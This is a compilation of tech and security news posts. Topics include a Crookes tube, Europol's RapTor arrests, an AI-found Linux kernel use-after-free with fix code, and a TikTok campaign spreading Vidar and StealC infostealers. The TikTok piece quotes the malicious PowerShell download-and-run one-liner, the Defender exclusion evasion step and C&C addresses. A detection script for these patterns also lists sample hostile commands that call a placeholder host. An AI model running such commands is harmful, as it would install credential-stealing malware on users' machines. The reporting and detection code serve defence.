After connecting a high voltage generator and switch, the Crookes tube should have been all set, but nothing happened when it was powered up. It turned out that a capacitance issue was preventing the tube from springing to life. Wrapping the cathode end of the tube in aluminum foil, [Markus] formed what is effectively a Leyden jar, and that was the trick that kicked things into action.

As of this writing, there are no longer any Crookes tubes that we could find on AliExpress, so you’ll have to look elsewhere if you’re interested in showing off your own 19th century electron-streaming experiment. Check out the Crookes Radiometer for some more of Sir William Crookes’s science inside blown glass.

youtube.com/embed/rd7Y9ZRhcLs?…


hackaday.com/2025/05/23/foil-l…


Europol Operation RapTor: 270 Arrests and 184 Million Seized. Dark Web Markets Collapse


A global enforcement operation coordinated by Europol has dealt a heavy blow to underground crime, with 270 arrests of dark web vendors and buyers in ten countries. Known as Operation RapTor, this international operation dismantled networks engaged in trafficking drugs, weapons and counterfeit goods, sending a clear signal to criminals hiding behind the illusion of anonymity.

The suspects were identified through coordinated investigations based on intelligence derived from the takedowns of the dark web marketplaces Nemesis, Tor2Door, Bohemia and Kingdom Markets. Many had made thousands of sales on illicit marketplaces, using encryption tools and cryptocurrencies to cover their tracks, but law enforcement stayed one step ahead.

This international action follows 2023's Operation SpecTor, which led to 288 arrests. Together, these operations demonstrate law enforcement's growing ability to penetrate the dark web's veil of secrecy.

Dark web vendors unmasked


The 270 arrests took place in the following countries:

  • United States of America: 130
  • Germany: 42
  • United Kingdom: 37
  • France: 29
  • South Korea: 19
  • Austria: 4
  • Netherlands: 4
  • Brazil: 3
  • Switzerland: 1
  • Spain: 1

Investigations are ongoing to trace and arrest other individuals involved in dark web crimes.

Millions seized, weapons recovered


Alongside the arrests, officers seized:

  • Over 184 million euros in cash and cryptocurrencies
  • Over 2 tonnes of drugs, including amphetamines, cocaine, ketamine, opioids and cannabis
  • Over 180 firearms, along with imitation weapons, tasers and knives
  • 12,500 counterfeit products
  • Over 4 tonnes of illegal tobacco

These seizures represent a serious disruption of the criminal supply chains that feed the dark web economy.

Europol's role


Europol supported the action by compiling and analysing intelligence packages based on data from the three seized markets. These packages were then shared with national authorities within the Joint Cybercrime Action Taskforce, hosted at Europol headquarters, to enable targeted investigations.

This operating model, also used in 2023's Operation SpecTor, shows that taking down a criminal platform is not the end of the story but the beginning of follow-up investigations aimed at identifying and arresting high-value vendors.

Edvardas Šileris, Head of Europol's European Cybercrime Centre, said: “Operation RapTor shows that the dark web is not beyond the reach of law enforcement. Thanks to close collaboration and information sharing, officers from four continents have identified and arrested suspects, sending a clear message to those who think they can hide in the shadows. Europol will continue to work with our partners to make the internet safer for everyone.”

Changing tactics, same threat


Recent operations are reshaping the dark web landscape. With traditional marketplaces under increasing pressure, criminals are shifting to smaller, single-vendor shops to avoid marketplace fees and minimise exposure.

Illegal drugs continue to be the best-selling commodity on the dark web, but 2023 also saw a surge in the trafficking of prescription drugs and an increase in fraudulent services, including fake hitmen and bogus listings designed to scam buyers. Despite these shifts, the message is clear: no platform is beyond the reach of coordinated international law enforcement efforts.

This global action was made possible by close cooperation between the following authorities:

  • Austria: Austrian Criminal Intelligence Service with various provincial criminal police departments (Bundeskriminalamt und Landeskriminalämter)
  • Brazil: Civil Police of the State of Pará (Polícia Civil do Estado do Pará) and Civil Police of the State of São Paulo (Polícia Civil do Estado do São Paulo)
  • France: French Customs (Douane), National Gendarmerie (Gendarmerie Nationale)
  • Germany: Federal Criminal Police Office (Bundeskriminalamt); Cologne Public Prosecutor's Office – Central Contact Point for Cybercrime (Staatsanwaltschaft Köln, Zentral- und Ansprechstelle Cybercrime); Central Criminal Investigation Department Oldenburg (Zentrale Kriminalinspektion Oldenburg); various police departments (Dienststellen der Länderpolizeien); German Customs Investigation (Zollfahndungsämter)
  • Netherlands: Team High Tech Crime (National Investigations and Special Operations (NIS) and Post Interventie Team (PIT); National Intelligence, Expertise and Operational Support (NIEO)
  • Spain: National Police (Policía Nacional)
  • South Korea: Seoul Central District Prosecutors' Office – Darknet Investigation Unit
  • Switzerland: Zurich Cantonal Police (Kantonspolizei Zürich) and Public Prosecutor's Office II of the Canton of Zurich (Staatsanwaltschaft II)
  • United Kingdom: National Crime Agency (NCA); National Police Chiefs’ Council (NPCC)
  • United States: Department of Justice (DOJ) with JCODE partner agencies (Federal Bureau of Investigation (FBI) and Drug Enforcement Administration (DEA); Food and Drug Administration (FDA) – Office of Criminal Investigations; Homeland Security Investigations (HSI); Internal Revenue Service (IRS) – Criminal Investigation; US Postal Inspection Service (USPIS); Bureau of Alcohol, Tobacco, Firearms and Explosives (ATF); Army Criminal Investigation Division (Army-CID); Customs and Border Protection (CBP); Department of Justice (DOJ); Department of the Treasury Financial Crimes Enforcement Network (FinCEN); Department of the Treasury Office of Foreign Assets Control (OFAC); Naval Criminal Investigative Service (NCIS))

The article Europol Operation RapTor: 270 Arrests and 184 Million Seized. Dark Web Markets Collapse comes from the cybersecurity blog.


First 0-day bug in the Linux kernel discovered by an AI! A turning point in bug hunting?


A zero-day vulnerability in the Linux kernel has been discovered using OpenAI's o3 model. This discovery, assigned CVE-2025-37899, marks a significant advance in AI-assisted vulnerability research.

The vulnerability, officially confirmed on 20 May 2025, affects the Linux kernel's ksmbd component, an in-kernel server implementing the SMB3 protocol for network file sharing. The problem is a use-after-free condition in the logoff command handler, which can have serious security implications. Specifically, while processing a logoff command, one thread frees the sess->user object. If another connection meanwhile attempts to set up the already-freed session again, it can access the same memory structure, causing undefined and potentially dangerous behaviour.
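To make the race concrete, here is a user-space model of the pattern described above together with one defensive fix. This is an added example, not ksmbd's code: the `struct session` / `struct user` layout, `session_logoff`, `session_reuse` and `race_demo` are assumptions for illustration, and the real kernel fix may differ. The unsafe shape is a logoff that frees the user object while leaving `sess->user` pointing at it, so a concurrent session setup on another connection can still reach freed memory. The hardened shape clears the pointer under the session lock before dropping a reference, and the setup path re-checks under the same lock and takes its own reference before touching the object.

```c
/* Added example, not ksmbd's code: a user-space model of the logoff
 * use-after-free pattern and a lock + refcount fix. All names are
 * assumptions for illustration. */
#include <pthread.h>
#include <stdatomic.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct user {
    atomic_int refcount;
    char name[32];
};

struct session {
    pthread_mutex_t lock;
    struct user *user;      /* NULL once the session is logged off */
    int logged_off;
};

static struct user *user_new(const char *name) {
    struct user *u = calloc(1, sizeof *u);
    if (!u) abort();
    atomic_init(&u->refcount, 1);
    snprintf(u->name, sizeof u->name, "%s", name);
    return u;
}

/* Take a reference: the holder may use u until it calls user_put(). */
static struct user *user_get(struct user *u) {
    atomic_fetch_add(&u->refcount, 1);
    return u;
}

/* Drop a reference; the object is freed only when the last one is gone. */
static void user_put(struct user *u) {
    if (atomic_fetch_sub(&u->refcount, 1) == 1)
        free(u);
}

static void session_init(struct session *s, const char *name) {
    pthread_mutex_init(&s->lock, NULL);
    s->user = user_new(name);
    s->logged_off = 0;
}

/* Logoff: clear the pointer under the lock first, then drop the reference,
 * so no other path can find the object once it may be freed. Idempotent. */
static void session_logoff(struct session *s) {
    pthread_mutex_lock(&s->lock);
    struct user *u = s->user;
    s->user = NULL;
    s->logged_off = 1;
    pthread_mutex_unlock(&s->lock);
    if (u) user_put(u);
}

/* Session reuse from another connection: lock, check, and take a reference
 * before reading the user. Returns 0 on success, -1 if already logged off. */
static int session_reuse(struct session *s, char *out, size_t outlen) {
    pthread_mutex_lock(&s->lock);
    if (s->logged_off || !s->user) {
        pthread_mutex_unlock(&s->lock);
        return -1;
    }
    struct user *u = user_get(s->user);
    pthread_mutex_unlock(&s->lock);
    snprintf(out, outlen, "%s", u->name);   /* safe: we hold a reference */
    user_put(u);
    return 0;
}

static void session_destroy(struct session *s) {
    session_logoff(s);
    pthread_mutex_destroy(&s->lock);
}

struct race_arg { struct session *sess; int result; };

static void *reuse_thread(void *p) {
    struct race_arg *a = p;
    char buf[32];
    a->result = session_reuse(a->sess, buf, sizeof buf);
    return NULL;
}

/* Race logoff against reuse `iterations` times; returns how many reuse
 * calls ended in one of the two legal outcomes (success or clean refusal). */
static int race_demo(int iterations) {
    int ok = 0;
    for (int i = 0; i < iterations; i++) {
        struct session s;
        struct race_arg a = { &s, 99 };
        pthread_t t;
        session_init(&s, "alice");
        if (pthread_create(&t, NULL, reuse_thread, &a) != 0) abort();
        session_logoff(&s);             /* runs concurrently with reuse */
        pthread_join(t, NULL);
        if (a.result == 0 || a.result == -1) ok++;
        session_destroy(&s);
    }
    return ok;
}

int main(void) {
    printf("%d/200 races ended safely\n", race_demo(200));
    return 0;
}
```

The order inside `session_logoff` is the whole point: the pointer is cleared while the lock is held and the reference is dropped only after the lock is released, so any concurrent reuse either sees a live object (and takes its own reference, keeping it alive until it is done) or sees `NULL` and refuses. Freeing first and clearing the pointer afterwards, or not clearing it at all, is the shape that produces the use-after-free.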

What makes the discovery even more notable is that the vulnerability was found by an artificial intelligence. Sean, the researcher who detected it, stated: “I found it using only the API of OpenAI's o3 model: no advanced tools, no frameworks, just pure natural language”. According to Sean, this is most likely the first vulnerability ever publicly discovered by a large language model (LLM), showing that AI has now reached a level of code comprehension that makes it a real ally (or threat) in cybersecurity.

Such vulnerabilities can cause memory corruption and potentially allow attackers to execute arbitrary code with kernel privileges. OpenAI's o3 model, released on 16 April 2025, represents a significant advance in AI reasoning capabilities. The model is designed to “think longer before responding” and shows substantially improved performance on complex tasks, including programming and mathematics.

Its ability to understand complex code structures and reason about concurrent operations proved key to identifying this vulnerability. “With o3, LLMs have made a leap forward in their ability to reason about code, and if you work in vulnerability research you should start paying close attention to them,” Sean noted. “They are now at a point where they can make you significantly more efficient and effective.”

Security experts assign this vulnerability a high severity score, although the Exploit Prediction Scoring System (EPSS) currently estimates a relatively low exploitation probability of 0.02%. The vulnerability affects several Linux kernel versions up to 6.12.27, 6.14.5 and 6.15-rc4.

Linux distributions, including SUSE, are already working on patches. SUSE's security team currently classifies the issue as “moderate severity”. Users are urged to install updates as soon as they become available.

The article First 0-day bug in the Linux kernel discovered by an AI! A turning point in bug hunting? comes from the cybersecurity blog.


Running DOOM on an Atari ST


Atari ST desktop with Doom shortcut

If you grew up with a beige Atari ST on your desk and a faint feeling of being left out once Doom dropped in 1993, brace yourself — the ST strikes back. Thanks to [indyjonas]’s incredible hack, the world now has a working port of DOOM for the Atari STe, and yes — it runs. It’s called STDOOM, and even though it needs a bit of acceleration or emulation to perform, it’s still an astonishing feat of retro-software necromancy.

[indyjonas] did more than just recompile and run: he stripped out chunks of PC-centric code, bent GCC to his will (cheers to Thorsten Otto’s port), and shoehorned Doom into a machine never meant to handle it. That brings us a version that runs on a stock machine with 4MB RAM, in native ST graphics modes, including a dithered 16-colour mode that looks way cooler than it should. The emotional punch? This is a love letter to the 13-year-old Jonas who watched Doom from the sidelines while his ST chugged along faithfully. A lot of us were that kid.

Sound is still missing, and original 8MHz hardware won’t give you fluid gameplay just yet — but hey, it’s a start. Want to dive in deeper? Read [indyjonas]’ thread on X.


hackaday.com/2025/05/22/runnin…


Recovering Water From Cooling Tower Plumes With Plume Abatement


The French Chinon nuclear power plant with its low-profile, forced-draft cooling towers. (Credit: EDF/Marc Mourceau)
Electrostatic droplet capture system installed on an HVAC condenser. (Credit: Infinite Cooling)
As a common feature with thermal power plants, cooling towers enable major water savings compared to straight through cooling methods. Even so, the big clouds of water vapor above them are a clear indication of how much cooling water is still effectively lost, with water vapor also having a negative impact on the environment. Using so-called plume abatement the amount of water vapor making it into the environment can be reduced, with recently a trial taking place at a French nuclear power plant.

This trial featured electrostatic droplet capture by US-based Infinite Cooling, which markets it as able to be retrofitted to existing cooling towers and similar systems, including the condensers of office HVAC systems. The basic principle as the name suggests involves capturing the droplets that form as the heated, saturated air leaves the cooling tower, in this case with an electrostatic charge. The captured droplets are then led to a reservoir from which it can be reused in the cooling system. This reduces both the visible plume and the amount of cooling water used.

In a 2021 review article by [Shuo Li] and [M.R. Flynn] in Environmental Fluid Mechanics the different approaches to plume abatement are looked at. Traditional plume abatement designs use parallel streams of air, with the goal being to have condensation commence as early as possible rather than after having been exhausted into the surrounding air. Some methods used a mesh cover to provide a surface to condense on, while a commercially available technology are condensing modules which use counterflow in an air-to-air heat exchanger.

Other commercial solutions include low-profile, forced-draft hybrid cooling towers, yet it seems that electrostatic droplet capture is a rather new addition here. With even purely passive systems already seeing ~10% recapturing of lost cooling water, these active methods may just be the ticket to significantly reduce cooling water needs without being forced to look at (expensive) dry cooling methods.

Top image: The French Chinon nuclear power plant with its low-profile, forced-draft cooling towers. (Credit: EDF/Marc Mourceau)


hackaday.com/2025/05/22/recove…


You Can 3D Print These Assistive Typing Tools


Typing can be difficult to learn at the best of times. Until you get the muscle memory down, it can be quite challenging. However, if you’ve had one or more fingers amputated, it can be even more difficult. Just reaching the keys properly can be a challenge. To help in this regard, [Roei Weiman] built some assistive typing tools for those looking for a little aid at the keyboard.

The devices were built for [Yoni], who works in tech and has two amputated fingers. [Roei] worked on many revisions to create a viable brace and extension device that would help [Yoni] type with greater accuracy and speed.

While [Roei] designed the parts for SLS 3D printing, it’s not mandatory—these can easily be produced on an FDM printer, too. For SLS users, nylon is recommended, while FDM printers will probably find best results with PETG. It may also be desirable to perform a silicone casting to add a grippier surface to some of the parts, a process we’ve explored previously.

The great thing about 3D printing is that it enables just about anyone to have a go at producing their own simple assistive aids like these. Files are on Instructables for the curious. Video after the break.

youtube.com/embed/OaDDa5VRGVM?…


hackaday.com/2025/05/22/you-ca…


Building a Tiny Table Saw


If you want a regular table saw, you’re probably best off just buying one—it’s hard to beat the economies of scale that benefit the major manufacturers. If you want a teeny one, though, you might like to build it yourself. [Maciej Nowak] has done just that.

The concept is simple enough; a small motor and a small blade make a small table saw. [Maciej] sourced a remarkably powerful 800-watt brushless motor for the build. From there, the project involved fabricating a suitable blade mount, belt drive, and frame for the tool. Some time was well-spent on the lathe producing the requisite components out of steel and aluminum, as well as a stout housing out of plywood. The motor was then fitted with a speed controller, with the slight inconvenience that it’s a hobby unit designed to run off DC batteries rather than a wall supply. Ultimately, though, this makes the saw nicely portable. All that was left to do was to fit the metal top plate, guides, and a suitably small 3″ saw blade to complete the build.

We’ve seen mini machine tools like these before, too. They can actually be pretty useful if you find yourself regularly working on tiny little projects. Video after the break.

youtube.com/embed/i17Ciew4Pcg?…


hackaday.com/2025/05/22/buildi…


2025 Pet Hacks Contest: Loko Tracks Fido with LoRa and GPS


Some projects start as hacks, and end as products — that’s the case for [Akio Sato]’s project Loko, the LoRa/GPS tracker that was entered in our 2025 Pet Hacks Contest. The project dates all the way back to 2019 on Hackaday.io, and through its logs you can see its evolution up to the announcement that Loko is available from SeeedStudio.

It’s not a device necessarily limited to pets. In fact, the original use case appears to have been a backup locator beacon for lost drones. But it’s still a good fit for the contest nonetheless: at 12 grams, the tiny tracking device won’t bother even the most diminutive of pups, and will fit on any collar at only 30 mm x 23 mm. The “ground station” that pairs with your phone is a bit bigger, of course, but unless you have a Newfoundland or a St. Bernard you’re likely bigger than Fido. The devices use LoRa to provide a range up to 15 km — maybe better if you can loop them into a LoRaWAN. Depending on how often you ping the tracker, it can apparently last for as long as 270 days, which we really hope you won’t need to track a missing pet.

The hardware is based around Seeed’s Wio-E5 LoRa chip, which packages an STM32 with a LoRa radio. The firmware is written in MicroPython, and everything is available via GitHub under the MIT license, though the code for the mobile app that interfaces with that hardware doesn’t appear to be in the repository at the moment. (There are folders, but they’re disappointingly empty.) The apps are available free on the iOS App Store and Google Play, however.

There’s still plenty of time to submit your own hacks to the Pet Hacks Contest, so please do! You have until April 25th, so if you haven’t started yet, it’s not too late to get hacking.

2025 Hackaday Pet Hacks Contest


hackaday.com/2025/05/22/2025-p…


Hackaday Supercon 2025 Call For Participation: We Want You!


We’re tremendously excited to be able to announce that the Hackaday Supercon is on for 2025, and will be taking place October 31st through November 2nd in Pasadena, California.

Supercon is about bringing the Hackaday community together to share our great ideas, big and small. So get to brainstorming, because we’d like to hear what you’ve been up to! Like last year, we’ll be featuring both longer and shorter talks, and hope to get a great mix of both first-time presenters and Hackaday luminaries. If you know someone you think should give a talk, point them here.

The Call for Participation form is online now, and you’ve got until July 3rd to get yourself signed up.

Honestly, just the people that Supercon brings together is reason enough to attend, but then you throw in the talks, the badge-hacking, the food, and the miscellaneous shenanigans … it’s an event you really don’t want to miss. And as always, presenters get in for free, get their moment in the sun, and get warm vibes from the Hackaday audience. Get yourself signed up now!

We’ll have more news forthcoming in the next few weeks, including the start of ticket sales, so be sure to keep your eyes on Hackaday.


hackaday.com/2025/05/22/hackad…


Now KDE Users Will Get Easy Virtual Machine Management, Too


If you work with virtual machines, perhaps to spin up a clean OS install for testing, historically you have either bitten the bullet and used one of the commercial options, or spent time getting your hands dirty with something open source. Over recent years that has changed, with the arrival of open source graphical applications for effortless VM usage. We’ve used GNOME Boxes here to make our lives a lot easier. Now KDE are also joining the party with Karton, a project which will deliver what looks very similar to Boxes in the KDE desktop.

The news comes in a post from Derek Lin, and shows us what work has already been done as well as a roadmap for future work. At the moment it’s in no way production ready and it only works with QEMU, but it can generate new VMs, run them, and capture their screens to a desktop window. Having no wish to join in any Linux desktop holy wars, we look forward to seeing this piece of software progress; as it’s a Google Summer of Code project, we hope there will be plenty more to see shortly.

Still using the commercial option? You can move to open source too!


hackaday.com/2025/05/22/now-kd…


A Brief History of Fuel Cells


If we asked you to think of a device that converts a chemical reaction into electricity, you’d probably say we were thinking of a battery. That’s true, but there is another device that does this that is both very similar and very different from a battery: the fuel cell.

In a very simple way, you can think of a fuel cell as a battery that consumes the chemicals it uses and allows you to replace those chemicals so that, as long as you have fuel, you can have electricity. However, the truth is a little more complicated than that. Batteries are energy storage devices. They run out when the energy stored in the chemicals runs out. In fact, many batteries can take electricity and reverse the chemical reaction, in effect recharging them. Fuel cells react chemicals to produce electricity. No fuel, no electricity.

Superficially, the two devices seem very similar. Like batteries, fuel cells have an anode and a cathode. They also have an electrolyte, but its purpose isn’t the same as in a conventional battery. Typically, a catalyst causes fuel to oxidize, creating positively charged ions and electrons. These ions move from the anode to the cathode, and the electrons move from the anode, through an external circuit, and then to the cathode, producing an electric current. Many fuel cells also produce potentially useful byproducts like water. NASA has the animation below that shows how one type of cell works.

youtube.com/embed/V3ChCroWttY?…

History


Sir William Grove seems to have made the first fuel cell in 1838, publishing in The London and Edinburgh Philosophical Magazine and Journal of Science. His fuel cell used dilute acid, copper sulphate, along with sheet metal and porcelain. Today, the phosphoric acid fuel cell is similar to Grove’s design.

The Bacon fuel cell is due to Francis Thomas Bacon and uses alkaline fuel. Modern versions of this are in use today by NASA and others. Although Bacon’s fuel cell could produce 5 kW, it was General Electric in 1955 that started creating larger units. GE chemists developed an ion exchange membrane that included a platinum catalyst. Named after the developers, the “Grubb-Niedrach” fuel cell flew in Gemini space capsules. By 1959, a fuel cell tractor prototype was running, as well as a welding machine powered by a Bacon cell.

One of the reasons spacecraft often use fuel cells is that many cells take hydrogen and oxygen as fuel and put out electricity and water. There are already gas tanks available, and you can always use water.

Types of Fuel Cells


Not all fuel cells use the same fuel or produce the same byproducts. At the anode, a catalyst ionizes the fuel, which produces a positive ion and a free electron. The electrolyte, often a membrane, can pass ions, but not the electrons. That way, the ions move towards the cathode, but the electrons have to find another way — through the load — to get to the cathode. When they meet again, a reaction with more fuel and a catalyst produces the byproduct: hydrogen and oxygen form water.

Most common cells use hydrogen and oxygen with an anode catalyst of platinum and a cathode catalyst of nickel. The voltage output per cell is often less than a volt. However, some fuel cells use hydrocarbons. Diesel, methanol, and other hydrocarbons can produce electricity and carbon dioxide as a byproduct, along with water. You can even use some unusual organic inputs, although to be fair, those are microbial fuel cells.

Common types include:

  • Alkaline – The Bacon cell was a fixture in space capsules, using carbon electrodes, a catalyst, and a hydroxide electrolyte.
  • Solid acid – These use a solid acid material as electrolyte. The material is heated to increase conductivity.
  • Phosphoric acid – Another acid-based technology that operates at hotter temperatures.
  • Molten carbonate – These work at high temperatures using lithium potassium carbonate as an electrolyte.
  • Solid oxide – Another high-temperature type, which uses zirconia ceramic as the electrolyte.

In addition to technology, you can consider some fuel cells as stationary — typically producing a lot of power for consumption by some power grid — or mobile.

Using fuel cells in stationary applications is attractive partly because they have no moving parts. However, you need a way to fuel it and — if you want efficiency — you need a way to harness the waste heat produced. It is possible, for example, to use solar power to turn water into gas and then use that gas to feed a fuel cell. It is possible to use the heat directly or to convert it to electricity in a more conventional way.

Space


Fuel cells have a long history in space. You can see how alkaline Bacon cells were used in early fuel cells in the video below.

youtube.com/embed/OouXKyroV4w?…
Apollo (left) and Shuttle (right) fuel cells (from a NASA briefing)
Very early fuel cells — starting with Gemini in 1962 — used a proton exchange membrane. In 1967, NASA started using Nafion from DuPont, an improvement over the older membranes.

Alkaline cells, though, had vastly better power density, and from Apollo on these cells, using a potassium hydroxide electrolyte, were standard issue.

Even the Shuttle had fuel cells. Russian spacecraft also had fuel cells, starting with a liquid oxygen-hydrogen cell used on the Soviet Lunar Orbital Spacecraft (LOK).

The shuttle’s power plant measured 14 x 15 x 45 inches and weighed 260 pounds. They were installed under the payload bay, just aft of the crew compartment. They drew cryogenic gases from nearby tanks and could provide 12 kW continuously, and up to 16 kW. However, they typically were taxed at about 50% capacity. Each orbiter’s power plant contained 96 individual cells connected to achieve a 28-volt output.

Going Mobile


There have been attempts to make fuel cell cars, but with the difficulty of delivering, storing, and transporting hydrogen, there has been resistance. The Toyota Mirai, for example, costs $57,000, yet owners sued because they couldn’t obtain hydrogen. Some buses use fuel cells, and a small number of trains (including the one mentioned in the video below).

youtube.com/embed/0d0h42IZlWU?…

Surprisingly, there is a market for forklifts using fuel cells. The clean output makes them ideal for indoor operation. Batteries? They take longer to charge and don’t work well in the cold. Fuel cells don’t mind the cold, and you can top them off in three minutes.

There have been attempts to put fuel cells into any vehicle you can imagine. Airplanes, motorcycles, and boats sporting fuel cells have all made the rounds.

Can You DIY?


We have seen a few fuel cell projects, but they all seem to vanish over time. In theory, it shouldn’t be that hard, unless you demand commercial efficiency. However, it can be done, as you can see in the video below. If you make a fuel cell, be sure to send us a tip so we can spread the word.

youtube.com/embed/NE6dxzDeWbI?…

Featured image: “SEM micrograph of an MEA cross section” by [Xi Yin]


hackaday.com/2025/05/22/a-brie…


Followed a nice tutorial on TikTok and weren't paying attention? Congratulations, you've caught malware!


In a worrying sign of how cybercriminal tactics are evolving, threat actors are now exploiting TikTok's popularity as a channel for distributing advanced information-stealing malware. The latest campaign in circulation focuses on spreading the Vidar and StealC infostealers, tricking users into running malicious PowerShell commands under the pretext of activating legitimate software or unlocking premium features in applications such as Windows, Microsoft Office, CapCut and Spotify.

Unlike traditional methods, such as compromised websites or phishing emails, this attack vector relies solely on social engineering delivered via video. The criminals produce anonymous videos, often generated with AI tools, that walk victims step by step through unknowingly installing the malware on their own devices.

This approach is particularly insidious because it leaves no malicious code on the platform itself for security solutions to detect: everything the viewer consumes is delivered visually and audibly. Trend Micro researchers identified several TikTok accounts involved in the campaign, including @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc and @digitaldreams771.

Their investigation revealed that some videos achieved considerable success: one in particular gained over 20,000 likes and 100 comments and reached roughly 500,000 views. This wide circulation demonstrates the campaign's potential impact and underlines how TikTok's algorithmic reach can amplify harmful content.

The consequences for victims are serious, since these infostealers can exfiltrate sensitive data, steal credentials and potentially compromise corporate systems. Once installed, the malware establishes communication with command-and-control servers, allowing the attackers to harvest valuable information from compromised devices.

Infection mechanism and technical analysis


The infection chain starts when users follow the video's instructions to open PowerShell (pressing Windows+R and typing "powershell") and then run a command similar to: iex (irm https://allaivo[.]me/spotify). This innocuous-looking one-liner downloads and executes a remote script (SHA256: b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886) that begins the infection. In PowerShell, irm is the alias of Invoke-RestMethod, which fetches the response body as a string, and iex is Invoke-Expression, which evaluates that string as code, so the first stage runs in memory without ever being written to disk as a script file.

Once running, the script creates hidden directories in the user's APPDATA and LOCALAPPDATA folders, then adds those paths to the Windows Defender exclusion list, an evasion technique that keeps the payloads dropped there from being scanned. Changing Defender exclusions needs an elevated session, so the victim has either clicked through a UAC prompt along the way or was already working as an administrator. The script then downloads further payloads, including the Vidar and StealC infostealers.
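As an added example, not code from Trend Micro or from this article, here is detection logic in Python that runs over constructed PowerShell script-block log entries (the ScriptBlockText of event 4104) and flags the three behaviours described above: an iex/Invoke-Expression download cradle, an Add-MpPreference exclusion that points into the user profile, and a directory being marked hidden. The log entries, the placeholder hostname and the rule names are assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Constructed sample of PowerShell script-block log entries (the ScriptBlockText
# field of event 4104 in Microsoft-Windows-PowerShell/Operational), one script
# block per string. The hostname is a placeholder, not the campaign's domain.
SAMPLE_SCRIPT_BLOCKS = [
    # 0: benign admin activity
    "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5",
    # 1: the one-liner the video tells the victim to type
    "iex (irm https://malicious.example/spotify)",
    # 2: what the fetched stage does: hidden dir in %APPDATA%, then a Defender exclusion
    "$d = Join-Path $env:APPDATA 'Updates'; New-Item -ItemType Directory -Path $d -Force | Out-Null; "
    "(Get-Item $d).Attributes = 'Hidden'; Add-MpPreference -ExclusionPath $d",
    # 3: same idea with LOCALAPPDATA and no intermediate variable
    "Add-MpPreference -ExclusionPath (Join-Path $env:LOCALAPPDATA 'cache')",
    # 4: an exclusion an admin might legitimately add; still logged, lower priority
    "Add-MpPreference -ExclusionPath 'D:\\BuildAgent\\work'",
    # 5: long-form cmdlet names and a WebClient cradle instead of irm
    "Invoke-Expression (New-Object Net.WebClient).DownloadString('https://malicious.example/office')",
]


@dataclass(frozen=True)
class Finding:
    rule: str
    evidence: str


# "Run whatever you just downloaded": iex/Invoke-Expression followed in the same
# block by a download primitive. Order matters, because the cradle wraps the fetch.
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:iex|invoke-expression)\b.*?\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b",
    re.IGNORECASE,
)
# Add-MpPreference ... -ExclusionPath <argument up to the next statement separator>
EXCLUSION_ADD = re.compile(r"\bAdd-MpPreference\b[^;]*?-ExclusionPath\s+([^;\n]+)", re.IGNORECASE)
# Either the environment variable or an expanded profile path
USER_PROFILE = re.compile(r"\$env:(?:LOCALAPPDATA|APPDATA)\b|\\AppData\\(?:Roaming|Local)\\", re.IGNORECASE)
# attrib +h, or setting the Hidden attribute from PowerShell
HIDDEN_ATTRIBUTE = re.compile(r"\battrib\b[^;]*\+h\b|\.Attributes\s*=\s*['\"]?Hidden", re.IGNORECASE)


def analyse_block(text):
    """Return the suspicious behaviours a single script block exhibits, in rule order."""
    findings = []
    m = DOWNLOAD_CRADLE.search(text)
    if m:
        findings.append(Finding("download_cradle", m.group(0)))
    for m in EXCLUSION_ADD.finditer(text):
        target = m.group(1).strip()
        # The campaign's tell is an exclusion that points into the user's own
        # profile. The path may be hidden behind a variable ($d in block 2), so
        # look at the whole block for APPDATA/LOCALAPPDATA, not just the argument.
        if USER_PROFILE.search(text):
            findings.append(Finding("defender_exclusion_user_profile", target))
        else:
            findings.append(Finding("defender_exclusion", target))
    m = HIDDEN_ATTRIBUTE.search(text)
    if m:
        findings.append(Finding("hidden_attribute", m.group(0)))
    return findings


HIGH = {"download_cradle", "defender_exclusion_user_profile"}


def triage(blocks):
    """Map block index -> (severity, findings) for every block that has findings."""
    result = {}
    for i, text in enumerate(blocks):
        findings = analyse_block(text)
        if not findings:
            continue
        severity = "high" if any(f.rule in HIGH for f in findings) else "medium"
        result[i] = (severity, findings)
    return result


if __name__ == "__main__":
    for i, (severity, findings) in triage(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"block {i}: {severity}")
        for f in findings:
            print(f"    {f.rule}: {f.evidence}")
```

In production the entries come from the Microsoft-Windows-PowerShell/Operational log with script block logging enabled, which is what makes the in-memory first stage visible at all. Defender also records every exclusion change as event 5007 in its own log, which gives a second, script-independent signal for the same step.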

These malware families are particularly dangerous because they target sensitive information, including saved passwords, cryptocurrency wallets and authentication cookies. After installation, the malware connects to various command-and-control servers, including legitimate services abused for the purpose.

Vidar, for example, uses Steam profiles (hxxps://steamcommunity[.]com/profiles/76561199846773220) and Telegram channels (hxxps://t[.]me/v00rd) as "dead drop resolvers" to hide its actual C&C infrastructure: the sample fetches a page on a legitimate service and reads the current C&C address from it, so blocking the real server only forces the operator to edit a profile. That makes tracking and disruption harder. What makes this campaign particularly effective is the way it blends social engineering with technical exploitation.

By posing as helpful tutorials for unlocking premium features of popular software, the videos build trust with viewers, who then willingly run the commands that compromise their systems. This is a significant evolution in social-media-based attacks, showing how threat actors keep adapting their tactics to exploit user behaviour and evade traditional security controls.

The article "Followed a nice tutorial on TikTok and weren't paying attention? Congratulations, you've caught malware!" was originally published on il blog della sicurezza informatica.


Trashed Sound System Lives to Rock another Day


Plenty of consumer goods, from passenger vehicles to toys to electronics, get tossed out prematurely for all kinds of reasons. Repairable damage, market trends, planned obsolescence, and bad design can all lead to an early sunset on something that might still have some useful life in it. This was certainly the case for a sound system that [Bill] found — despite a set of good speakers, the poor design of the hardware combined with some damage was enough for the owner to toss it. But [Bill] took up the challenge to get it back in working order again.
Inside the DIY control unit.
The main problem with this unit is that of design. It relies on a remote control to turn it on and operate everything, and if that breaks or is lost, the entire unit won’t even power on. Tracing the remote back to the control board reveals a 15-pin connector, and some other audio sleuths online have a few ways of using this port to control the system without the remote.

[Bill] found a few mistakes that needed to be corrected, and was able to get an ESP8266 (and later an ESP32) to control the unit, thanks largely to the fact that it communicates using a slightly modified I2C protocol.

